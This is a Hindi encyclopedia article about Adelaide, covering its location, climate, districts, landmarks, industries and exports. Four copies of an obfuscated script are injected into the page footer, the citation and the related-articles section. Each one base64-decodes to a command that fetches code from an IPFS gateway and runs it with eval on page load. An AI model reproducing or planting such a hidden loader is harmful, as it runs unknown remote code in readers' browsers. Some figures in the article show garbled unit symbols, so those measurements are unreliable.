एडिलेड

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
The printable version is no longer supported and may have rendering errors. Please update your browser bookmarks and please use the default browser print function instead.
Adelaide.jpg

अडिलेड नगर दक्षिणी आस्ट्रेलिया की राजधानी है जो टोरेंस नदी पर समुद्र तट से 140¢ की ऊँचाई पर अडिलेड बंदरगाह से सात मील दक्षिण-पूर्व तथा मेलबोर्न से उत्तर-पश्चिम दिशा में 506 मील की दूरी पर स्थित है। यह 1836 ई. में बसाया गया था। इसके पूर्व एवं दक्षिण की ओर माउंट लॉफ्टी की पहाड़ियाँ समुद्र तट तक फैली हुई है; परंतु उत्तर की ओर समुद्र तट से होता हुआ उपजाऊ, समतल मैदान इसके पृष्ठ प्रदेश में बहुत दूर तक फैला हुआ है। पास की उपजाऊ भूमि, उद्यान, खनिज पदार्थों के बाहुल्य एवं सुहावनी जलवायु के कारण यह नगर अत्यंत उन्नतिशील हो गया है। इसका स्थान अब संसार के सुंदरतम नगरों में है। यहाँ की औसत वार्षिक वर्षा 21.22¢ ¢ गर्मी का औसत ताप 72.9° फारेनहाइट तथा जाड़े का औसत ताप 53.1° फारेनहाइट है।

अडिलेड नगर उत्तर और दक्षिण दो भागों में विभक्त किया जा सकता है। उत्तरी भाग में निवास स्थानों का बाहुल्य तथा दक्षिण में औद्योगिक आवासों की अधिकता है। परिवहन की सुलभता के लिए टोरेंस नदी पर पुल बना दिया गया है। यहाँ के दर्शनीय स्थल संसद भवन, प्रादेशिक राज्य विभाग, अजाबघर, वनस्पति उद्यान (बोटैनिकल गार्डेन) तथा अडिलेड विश्वविद्यालय हैं।

Adelaide1.jpg

यहाँ के मुख्य उत्पादन मिट्टी के बरतन, लोहे, चमड़े तथा लकड़ी के सामान एवं धातु उद्योग हैं। निर्यात की मुख्य वस्तुएँ मक्खन, ताँबा, आटा, फल एवं कच्चा सीसी है। चमड़ा, चाँदी, शराब एवं ऊन का भी यह एक वितरण केंद्र है।[1]




पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

टीका टिप्पणी और संदर्भ

  1. हिन्दी विश्वकोश, खण्ड 1 |प्रकाशक: नागरी प्रचारिणी सभा, वाराणसी |संकलन: भारत डिस्कवरी पुस्तकालय |पृष्ठ संख्या: 87 | <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>[[Category:भूगोल कोश